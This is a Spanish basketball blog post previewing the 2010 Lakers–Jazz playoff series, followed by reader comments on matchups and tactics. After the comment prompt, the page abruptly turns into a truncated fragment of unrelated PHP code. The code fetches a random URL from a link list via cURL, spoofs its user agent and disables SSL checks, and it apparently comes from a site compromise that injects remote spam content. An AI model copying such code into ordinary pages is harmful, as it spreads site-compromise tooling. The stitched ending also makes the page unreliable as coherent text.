Análisis Los Angeles Lakers vs Utah Jazz

02 de May de 2010 por TheDeerHunter

Regular: 3-1 Lakers

Lakers: 101.7 p. favor (12º) – 97 p. contra (9º)
Jazz: 104.2 p. favor (4º) – 98.9 p. contra (12º)

Todo un clásico de la postemporada en los últimos años. Los Lakers han encontrado la fórmula mágica para superarlos, pero estos Jazz ya no son los mismos como también los campeones han cambiado. Este curso los pupilos de Sloan se han convertido en un equipo arrollador ofensivamente. Así lo han confirmado en primera ronda donde han arrasado literalmente a uno de los favoritos para llegar a la final. Los actuales Lakers son mucho más defensivos, pero menos brillantes. Sloan ya no tiene que preocuparse de que le endosen 120 puntos. Ahora será la faena de Phil Jackson el evitar que sean sus rivales los que se acerquen a esa cifra.

Claves de la eliminatoria:

El estado de Kobe: La “Mamba negra” ha sido el verdadero azote de los Jazz estos años. Contra los Thunder hemos visto un Kobe vulnerable, mermado. Es cierto que la defensa sobre él ha sido muy buena como también hay que esperar que lo sea la de los perros de presa que le asigne Sloan. Si el 24 recupera su nivel los Jazz no tendrán posibilidades.

Los bases hacen daño a Phil Jackson: Esta frase se ha convertido en un axioma. Si le añadimos que Deron es el mejor de entre los bases y que su duelo contra Fisher parece más desequilibrado que nunca tenemos un problema en ciernes para los Lakers. Sin embargo, la experiencia nos ha enseñado que Deron Williams no lo suele pasar bien cuando juega contra el equipo angelino y Fisher lo conoce más que ningún otro base.

El duelo interior: Con Bynum con problemas físicos el duelo contra Boozer y Millsap parece más complicado que nunca. Los Lakers no podrán sacar mucha ventaja como sí hicieron durante la primera ronda. Quien se lleve este duelo tendrá muchas papeletas para llegar a la final de conferencia.

¿Quién narices es Ron Artest?: Los Jazz no tienen ningún alero estelar al que haya que anular. Posiblemente será ahora cuando los Lakers van a echar más de menos a Ariza.

Agenda:

– P1: Hoy a las 21:30h hora española.
– P2: Martes 4 de Mayo a las 4:30h
– P3: Sábado 8 de Mayo a las 2h
– P4: Lunes 10 de Mayo a las 4:30h

Pronóstico: 4-2 Lakers

Comenta

12 comentarios a esta entrada

  1. kantonyo dice:
    #1

    Un tal Pau Gasol se acaba de comer con patatas a un tal Carlos Boozer…. Partidazo!!!

    Es un chiste que ne le hayan dado ni un sólo punto para MVP de la temporada, y eso que puntuan los 5º primeros de la liga….

      Citar

  2. aro_pasado_no_newtoniano dice:
    #2

    Mira que es bueno el de Sant Boi. Dios. Ahora mismo, más importante que Bryant, sin duda. Lástima que su físico no le dé para aguantar en modo playoff todo el año.

      Citar

  3. jose laker dice:
    #3

    Si señor, buen análisis, coincido en prácticamente todo contigo. Ahora el tema estaría en que Artest, sin tener que “quemarse” tanto en defender, pudiera meter más puntos, porque su porcentaje en triples es horrible, y eso que tira solo. Los pívots de los Jazz son guerreros, pero bastante más bajitos, y eso es un hándicap importante. De todos modos, en el primer partido ya se ha visto que las lagunas de concentración y el escaso banquillo pueden dar un susto a los Lakers, si se ponen 2-0 la cosa está medio hecha, pero como el 2º se lo lleve Utah se puede liar.

      Citar

  4. AndiD dice:
    #4

    Bueno, pues ya sabemos el nuevo rol de Artest: defender a Deron Williams!
    Ha estado varias veces defendiendo al base desde el principio de la jugada, sin cambios previos.

      Citar

  5. Love Denise dice:
    #5

    Creo que LAL debería jugar con Brown de base, para defender a Deron. Si LAL muestra un cierto nivel, creo que debería tener menos problemas con los Jazz que con los Thunder.

      Citar

  6. TheDeerHunter dice:
    #6

    Pero LDenise… ¿qué se le puede achacar a Fisher anoche?
    Ya eres más papista que el papa…

    De todas formas, como alternativas… además de la de Artest que no terminó de funcionar, está Brown como bien dices, Fisher… y no olvidemos a Kobe.

    No me cabe duda de que Phil Jackson va a ir ajustando esa defensa. Si controlas a Deron controlas a los Jazz.

      Citar

  7. Love Denise dice:
    #7

    Vamos a ver, he dicho algo en contra de Fisher?
    con mi comentarko he querido decir que antes que poner a Ron defendiendo a Deron, pondría a Brown.
    Deron juega 38 min, si Brown lo defiende unos 15-20 min, pienso que no estaría mal.
    Soy el primero en reconocer que por ahora Fisher me ha sorprendido positivamente

      Citar

  8. TheDeerHunter dice:
    #8

    Ya bueno, yo lo decía porque en el tramo final fue Fisher quien se ocupó de Deron… el momento en el que los que se colapsaron fueron los Jazz. Por eso me extrañaba tu comentario.

    Es cierto que el asunto Artest me está desconcertando mucho. No sé cómo los Lakers le sacarán provecho en esta serie… quizás ¿haciendo jugar a Kobe de 3 y metiendo a Shannon? podría ser. De momento a mí Artest me sobra en esta serie… a no ser que encuentre la manera de sacar ventaja al poste (que eso sí lo hacía más o menos apañado Ron Ron cuando llegó a ser all-star)
    Y ojito a Walton que está empezando a dar buenos minutos… cada día mejor

      Citar

  9. Love Denise dice:
    #9

    y cobra 5 kilos y pico (36 en total) que pesan como una losa. Lo que hace él, lo podrían hacer otros por mucho menos de la mitad. para mí, el gran error del General manager en los últimos años.

      Citar

  10. TheDeerHunter dice:
    #10

    Que sí que sí… pero a mí lo que le paga Mr. Buss no me lo descuentan de la nómina (por suerte)
    Una vez que hay que cumplir el contrato, yo de lo que me alegro es que poco a poco se le vea mejor de sus problemas físicos. Un jugador que en condiciones normales aporta mucho más de lo que los “profanos” en la asignatura L.A os podéis remotamente imaginar.

      Citar

  11. Toni dice:
    #11

    Walton bien pero en 5minutos de 4o cuarto el banquillo de los lakers echó a perder 7/8pts de ventaja que facilmente podrían haberle costado la ventaja de campo.
    Como decís, muy bien Gasol que por momentos parece mas importante que Kobe y muy bonito el duelo Boozer-Gasol, nos espera una serie emocionante.
    Ayer la mayoria de buenas defensas a Deron las efectuó Fisher que se marcó un partido de bandera.

      Citar

  12. TheDeerHunter dice:
    #12

    Efectivamente, pero en esos minutos estaban en cancha Bynum y Odom… así que no es del todo cierto eso de que “los suplentes” echaron a perder la ventaja.
    Por otro lado, el cambio de Kobe y Gasol lo podría haber hecho Phil un par de minutos antes y nos hubiera ahorrado algún sufrimiento que otro.

    También estoy esperando alguna alternativa táctica a lo de Artest… que no vendría mal.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>